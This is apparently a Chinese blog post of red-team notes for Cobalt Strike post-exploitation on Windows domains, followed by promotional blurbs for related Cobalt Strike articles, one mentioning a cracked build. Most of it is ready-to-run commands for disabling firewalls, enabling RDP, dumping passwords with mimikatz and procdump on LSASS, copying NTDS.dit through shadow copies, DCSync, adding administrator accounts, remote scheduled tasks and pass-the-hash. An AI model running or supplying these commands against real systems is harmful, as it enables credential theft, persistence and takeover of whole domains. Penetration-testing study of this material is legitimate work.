Cobalt Strike

已于 2024-10-12 16:29:20 修改
阅读量262 收藏 3
点赞数 5
文章标签: linux 运维 服务器
于 2024-10-09 21:32:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71332744/article/details/142024509
版权

信息收集

主机信息收集

# ip信息
shell ipconfig
# 系统信息,补丁信息
shell systeminfo
# 架构
shell echo %PROCESSOR_ARCHITECTURE% 
# 软件信息
shell wmic product get name,version
# 查看安装服务
shell wmic service list brief
# 查看运行进程
shell talklist
shell wmic process list brief
# 查看开机自启程序
shell wmic startup get command.caption
# 查看计划任务
schtasks /query /fo LIST /v
# 查看主机时间
shell net statistics workstation
# 查看本地有什么用户
shell net user
# 查看会话列表
shell net session
# 查看开启端口
shell netstat -ano
# 杀毒软件信息
shell wmic /node:localhost /namespace:\\root\securitycenter2 path
# 查看是否存在共享文件夹
shell net share
# 查看防火墙状态/配置
shell netsh firewall show state/config
# 关闭防火墙
shell netsh firewall set opmode disable
# 允许指定程序进行全部连接
shell netsh firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
# 允许3389端口放行
shell netsh advfirewall firewall add rule name="name" protocol=TCP dir=in localport=3389 action=allow 
# 开启3389
shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
# 获取wifi配置文件
netsh wlan show profiles
# 获取wifi详细信息
netsh wlan show profile name="SSID_NAME" key=clear
# 查看arp缓存
shell arp -a
# 查看本地工作组
shell net localgroup
# 查看RDP凭证
shell dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

域内信息收集

域内基本信息

# 查看主机是否在域内
systeminfo
ipconfig /all
# 查看是否为域用户
whoami
# 查看当前组
shell net localgroup
# 查域内有多少个组
net group "groupname" /domain
# 查看域内有多少主机
net view


#打印路由表
route print 
# 打印arp表
arp -a
# 显示端口
netstat -ano
# 查看域信任关系
nltest /domain——trusts
# 查看域控
net time /domain  # 只有域用户才能查出来
nltest /DCLIST:hacke
# 定位域管理员用户
net group "domain admins" /domain


hostname和whoami 显示的不同大概率为域用户
获取到shell-》kali 自动化脚本
run winenum

powersploit(进入攻击脚本)
获取到shell-》
加载脚本
load powershell
导入脚本
powershell_import 路径/PowerView.ps1
执行脚本(可以搜索powersploit命令,在execute后执行就行)
powershell_execute get-NetDomain
powershell_execute get-NetUser
powershell_execute get-NetComputer

定位域控

# 获取到域控ip
ping 域名
shell nslookup -type=SRV _ldap._tcp

定位域管理员登录的主机

# 使用PsLoggedon.exe,需要上传到以控制的域内主机中
PsLoggedon.exe \\hostname
PsLoggedon.exe username

# 自动化获取域内登录的用户
PVEFindADUser.exe -current

netview.exe -d

powershell.exe -exec bypass -command "& {fimport-module .\PowerView.ps1;|nvoke-UserHunter}"

内网主机扫描

 shell for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.20.%I | findstr "TTL="

fscan:全自动内网信息扫描

fscan.exe -h 网段

密码抓取

# 工具mimikatz 要求:权限为:admin、system、UAC用户
在线读取
shell mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

离线读取
将sam文件导出,system是sam的密钥
shell reg save hklm\sam sam.hive
shell reg save hklm\system system.hive
再使用mimikatz进行读取
token::elevate
lsadump::sam /sam:sam.hive /system:system.hive

读取lsass进程的密码
找到lsass的进程好
tasklist | findstr lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
使用minidump等工具导出内存

高版本抓密码(高版本win系统不缓存明文密码)

修改缓存

开启缓存记录
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
锁屏命令
rundll32.exe user32.dll,LockWorkStation

可以抓取到明文密码

 ssp内存注入

# 重启后失效,会将密码保存在c:\windows\system32\mimilsa
shell mimikatz "privilege:debug" "misc::memssp" exit

# 由于权限问题无法直接访问到mimilsa
需要创建计划任务使用bat文件去复制
schtasks /create  /tn copy /sc onstart /tr C:\Users\1001\Desktop\1.bat /ru system /f



1.bat
 copy C:\windows\system32\mimilsa.log C:\Users\1001\Desktop\1.txt

运行
schtasks /run /i /tn "copy"

---------------------------------------------------------------------------------------
ssp开机自启,存放在c:\windows\system32\kiwissp
shell copy mimilib.dll c:\windows\system32
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f

域控账号密码抓取

域账号信息存放在C:\Windows\NTDS.DIT,密钥:system.hive

# 使用ntdsutil工具(域控服务器自带,备份工具)
创建快照
ntdsutil.exe snapshot "activate instance ntds" create q q
挂载
ntdsutil.exe snapshot "mount {1efdbb78-49ea-49db-a4ea-ddf3aef1701f}" q q
复制出来
copy  C:\$SNAP_202409261557_VOLUMEC$\windows\ntds\ntds.dit C:\Users\Administrator\Desktop\
删除快照
ntdsutil.exe snapshot "umount {1efdbb78-49ea-49db-a4ea-ddf3aef1701f}" "delete {1efdbb78-49ea-49db-a4ea-ddf3aef1701f}" q q

# 使用vssadmin
创建快照
vssadmin create shadow /for=c:
复制
shell copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit C:\Users\Administrator\Desktop\ntds2.dit
删除
vssadmin delete shadows /for=c: /quiet

也可使用copy-vss工具、lnvoke-ninjacopy(日志较少)

ntds文件读取

# 使用ntdsdumpex工具
NTDSDumpEx -d ntds.dit -s system.hive -o 1.txt

在线获取域用户信息

mimikatz lsadump::dcsync /domain:wang.com /all /csv

Dcsync攻击(domain control synchronization)

Dcsync用于域林之间不同域控去同步数据,使用drs协议去同步

可以使用的用户范围

admin

domain admins

enterprise admins

DC 本地用户

# 使用mimikatz可以伪造dcsync包去欺骗域控,可以不用域控的shell远程获取domain的用户信息
有权限时
mimikatz lsadump::dcsync /domain:wang.com /all /csv

没权限但有一个用户密码的hash时
secretsdump.exe 域名/用户名:密码@ip


明文读取(前提使用了可逆加密)

RDP远程密码抓取

rdp使用masterkey加密后保存在本地,然后下次使用时就不用输入密码

# 在线读
查看连接记录
cmdkey /list

查找本地凭据(credentials)
dir /a %userprofile%\appdata\local\microsoft\credentials\*

读取凭据,找到guid
mimikatz dpapi::cred /in:绝对路径

读取内存找到guid对应的masterkey
mimikatz sekurlsa::dpapi

读取凭据并使用msaterkey解密
mimikatz dpapi::cred /in:绝对路径 /masterkey:



# 离线读
保存lsass文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz载入lsass内存
sekuelsa::minidump lsass.dmp
使用上面的方法进行读取

 

横向移动

# 开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

# 查看rdp端口
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /V PortNumber

# 抓取密码

#hash远程
mimikatz sekurlsa::pth /user:administrator /domain:192.168.20.110 /ntlm:8019de0efe99442ffecc78646755d4ac "/run:mstsc.exe /restrictedadmin"


# 添加账号,进行远程
net user wangg password /add
shell net localgroup Administrators wangg /add

todesk远程

#静默安装
todesk.exe /S

# 查看todesk中的配置文件,获取账号信息
type c:\"Program Files"\Todesk\config.ini
# 使用本地的hash值替换配置文件

IPC$

利用条件

1.开启了139、445端口

2.开启了默认分享盘符

3.知道用户名和密码

# 增加删除IPC,建立连接后无需密码直接访问
net use \\192.168.10.160\IPC$ "qwe123@#" /user:administrator
net use \\192.168.10.160\IPC$ del

# 盘符映射
net use k: \\192.168.20.222\c$

管理共享文件

net share C$ /del
net share 共享名=位置

IPC命令

dir \\192.168.10.160\C$

远程添加计划任务

# 创建
schtasks /create /s 192.168.20.222 /p qwe123@# /u administrator /tn test /tr c:/1.exe /sc onstart /RU System /F
# 运行
schtasks /run /s 192.168.20.222 /i /tn "test"
# 删除
schtasks /delete /s 192.168.20.222 /u administrator -p qwe123@# /tn test /f

PTH(Pass The Hash)

PTH攻击有意义的用户(administrator、domain admin)

# 可以直接发送NTLM值进行远程
psexec 也能远控
wmiexec.exe -hashes 8019de0efe99442ffecc78646755d4ac:8019de0efe99442ffecc78646755d4ac administrator@192.168.20.110

# 使用mimikatz
sekurlsa::pth /user:administrator /domain:192.168.20.110 /ntlm:8019de0efe99442ffecc78646755d4ac

王同学_116
关注
CobaltStrike安装
m0_71518346的博客
06-07 1336
CobaltStrike 是一款渗透测试神器,被业界人称为 CS 神器。CobaltStrike 分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike 集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!
cobaltstrike安装使用
w7deer的博客
05-06 5823
Cobalt Strike是一款基于java的渗透测试神器,被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马、win dll木马、java木马、office宏病毒等,钓鱼攻击包括:站点克隆,目标信息获取等
Cobalt Strike安装
qq_40624810的博客
07-25 1465
背景 早就听说cs(Cobalt Strike)大名了,今天尝试安装一下。过程中遇到种种坑,其实大多数都是因为自己的蠢。吃一堑长一智以后长点脑子。 一、JAVA环境 cs无论是客户端或者服务端都要依赖于java环境,所以我们先要安装java环境。这里我们服务器是基于debain版本的linux,所以我们linux安装jdk-11.0.8_linux-x64的java环境,因为我记得cs官方文档里好像说过jdk要11.0以上版本。具体安装包可以官网下载。下载好我们上传到服务器开始安装安装位置 在
Cobalt Strike安装
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-09 2165
Cobalt Strike,是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
Cobalt Strike安装教程
小小猪的博客
12-10 9440
Cobalt Strike安装教程 Cobaltstrike简介: Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。这款神器许多大佬们都已经玩的很6,我一个菜鸡玩的略有心得,因此写一下自己的Cobaltstrike系列文章,希望给各位一点帮助。 最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimi
cobalt strike 4.7
06-07
Cobalt Strike 4.7 是一款广泛应用在网络安全领域的高级渗透测试工具,它主要用于模拟攻击者行为,评估组织的安全防御能力。C2(Command and Control)工具是指远程控制服务器Cobalt Strike 在此领域中扮演了核心...
Cobalt Strike 4.8 Full Black Edition
最新发布
06-23
Cobalt Strike是一款广泛应用于网络安全测试、红队操作和漏洞利用模拟的专业工具,其4.8 Full Black Edition是该软件的一个版本。这个版本通常包含了所有功能,并可能包含一些额外的特性或者更新,专为安全研究人员...
CobaltStrike4.5,渗透利器
12-17
在执行前,必须确认系统已经安装了Java运行环境,因为Cobalt Strike基于Java构建,如`cobaltstrike.jar`和`CSAgent.jar`所示。这些JAR文件包含了Cobalt Strike的主要功能和组件。 `.cobaltstrike.beacon_keys`文件...
CobaltStrike4.4.zip
09-15
在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关的文件,它们在网络安全测试和防御演练中扮演着重要角色。 首先,`agscript`可能是指Cobalt Strike的Aggressor Script,这是一种...
在kali2020.4 linux 安装cobaltstrike4.2.docx
05-03
安装 cobaltstrike4.2
红队内网渗透神器--CobaltStrike安装教程
热门推荐
Aluxian_的博客
11-15 1万+
CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!
渗透工具Cobalt Strike安装使用教程
爱玩游戏的黑客的博客
11-23 6074
CS工具使用教程
CS(Cobalt strike)小白安装
weixin_58107256的博客
07-30 1892
cobalt strike 是一个非常牛逼的工具 支持主机上线、提权、凭据导出、端口转发、socket代理、office攻击、文件捆绑、钓鱼等 要使用这个CS呢就必须要安装一个java1.8的环境 长这样 然后解压CS包 在cobaltstrike/Cobalt Strike 3.13 Cracked目录下选择CS的应用程序 长这样 发现需要IP(HOST) 这个时候我们将CS解压后的文件夹放在列入kali上面 照图做 那个密码是你用户的密码 应为我用的s...
最新红队内网渗透神器--CobaltStrike安装教程,让人茅塞顿开
2401_84247423的博客
05-09 354
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CobaltStrike安装及使用实验(保姆级教程),高级网络安全都应该知道
2401_83974370的博客
04-13 1066
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
CobaltStrike渗透测试指南
"CobaltStrike.pdf - 一篇关于Cobalt Strike的详细教程文档,主要涵盖其简介、基本使用、模块介绍、脚本使用和扩展功能,特别提到了Malleable C2和External C2等内容。" Cobalt Strike是一款广泛应用于网络安全领域...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值